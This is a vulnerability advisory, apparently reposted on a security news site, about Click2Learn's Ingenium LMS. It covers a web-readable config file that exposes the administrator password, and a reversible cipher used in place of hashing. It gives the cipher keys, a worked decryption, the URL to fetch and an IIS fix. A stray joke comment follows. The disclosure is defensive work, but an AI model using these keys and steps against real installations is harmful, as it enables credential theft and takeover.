|
Brought to you by:
Suppliers of:
|
|
|
| |
| This paper describes two vulnerabilities in Click2Learn's Ingenium Learning Management System. The first shows that the administrator password is available, in the clear, by requesting a particular URL. The second shows that the password hashing scheme does not provide adequate protection. |
| |
Credit:
The original advisory can be downloaded from:
http://netninja.com/papers/ingenium/advisory.txt
A Java implementation of the password decryption can be downloaded from:
http://netninja.com/papers/ingenium/IngeniumDecoder.java
The information has been provided by Brian Enigma.
|
| |
Affected Systems:
Known to work on v5.1 and v6.1. It is likely that all versions are vulnerable. Click2Learn's Aspen LMS has not been tested.
All Ingenium installations visible to the public Internet should be examined immediately.
Administrator Password Hash Vulnerability:
Ingenium stores a number of configuration parameters in a Microsoft SQL database. It also must store a few values on the local system, as it needs to know several important values before being able to access the database--for instance, the location, login, and password for connecting to the database. Basically this is the database "bootstrap" information. In examining the file more closely (it is called [install directory]/config/config.txt), Brian also noted that the application's administrator password, as a hashed value, is also stored in this file. Even further inspection of the file location, directory structure, and IIS installation shows that the file is located in a folder under the htdocs web directory. This means that a simple HTTP request can grab the configuration file.
In most default installations, replacing the "default.asp" file name in the URL, when looking at the Ingenium home page, with "config/config.txt" will retrieve the file, including the administrator password hash. This is just plain silly! Most web programmers with any amount of training or experience know that you need to store your data out-of-band from the documents/programs. Raw data files should not be web accessible.
While this particular vulnerability is a known issue (see Click2Learn's Knowledge Base article Q1254), it is brushed off as advice for the paranoid. Personal observation has not shown a single site that hides this configuration file. Utilizing this vulnerability leads us to the importance of the next one.
Administrator Password Hash Decryption:
You may or my not already know that the best way to store passwords in a persistent data store is with a one-way hash function. In fact, this is how all UNIX systems work. You cannot reverse out a password from a password hash without a lot of brute force--in most cases, so much number crunching that the process is not worth it. You may also know that one of the worst ways to store passwords (or any data) is with XOR "encryption." Two large enough samples and a minute of math will give you a pretty darn good idea of what the "encryption" key is. An even less secure method of encrypting data is with a secret decoder ring. In fact, most newspapers have a "Cryptogram" section with the Sunday comics that lets you solve these as a diversion. It is called a Caesar cypher and is made mildly more challenging/annoying by varying the offset depending on the position of the letter in the message.
Passwords are not case sensitive--it would appear they are converted to uppercase before being "encrypted." The example code will only decode letters and numbers, no special symbols, but the theory still applies.
In this particular cipher implementation, the key is:
9'$%100'%6
This key repeats if the plaintext is longer than ten characters. To decode a given piece of cyphertext, you simply take the hex value of the cyphertext character and subtract the hex value of the key character in the same position, giving you a plaintext hex characters. Note that the number space wraps between 0x20 and 0x7D. Just in case you are not following, an example is in order. Let us say, as an example, that the password line in config.txt is "General\LocalAdmin=|smh|#'hp{9'$%10". The decoding goes something like this:
cypher: |smh|#'hp{9'$%10
subtract key: 9'$%100'%69'$%10
You will note that only the first ten characters are significant. The rest are NULLs in the plaintext, giving the cyphertext character the same value as the key character at that position. Worked out in hex, this becomes:
cipher: 7c 73 6d 68 7c 23 27 68 70 7b
subtract key: 39 27 24 25 31 30 30 27 25 36
-----------------------------
equals: 43 4c 49 43 4b 51 55 41 4b 45
in ASCII: C L I C K Q U A K E
You will notice that the "Q" and "U" wrapped down below 0x20, and back around to 0x7D. Experimentation also shows that the numeric digits are somehow offset such that zero (normally 0c30) is mapped to lowercase n (0x6E). Symbols are also mapped into this area, but have not been completely explored.
User Password Hash Visibility:
This issue is not as severe as the administrator password. A user will need SELECT access in the database to utilize this vulnerability. A simple SELECT * FROM IWC_USR will give you a list of logins and their corresponding password hashes. The password hash employs the same algorithm as above, only you will need to remove the "$" at the beginning of the password hash and use a slightly different key (the characters "i0)'0+7/" repeated).
Solution:
A good long-term solution would be a software update from Click2Learn that moves the files in the "config" directory (and possible others) to a path outside of the web documents. This requires engineering time and QA resources. Also, this solution may not apply to entities that purchased the Ingenium LMS without a support contract.
A simple and immediate solution would be to block the config.txt file from being downloadable. Configuring IIS to block access to this directory can achieve the desired result. This is a simple operation. First, open the Internet Management console. Next locate the "config" web folder. Right-click on it and select "Properties." Uncheck the "Read" and "Index" checkboxes and click "OK."
|
| Subject:
|
hi |
Date: |
29 Jul. 2006 |
| From: |
hi |
haaha
char left
i love that
sounds like charictor
but
i can insert a certain language in here
:-D
watch out
|
|
|
|
|
|
|
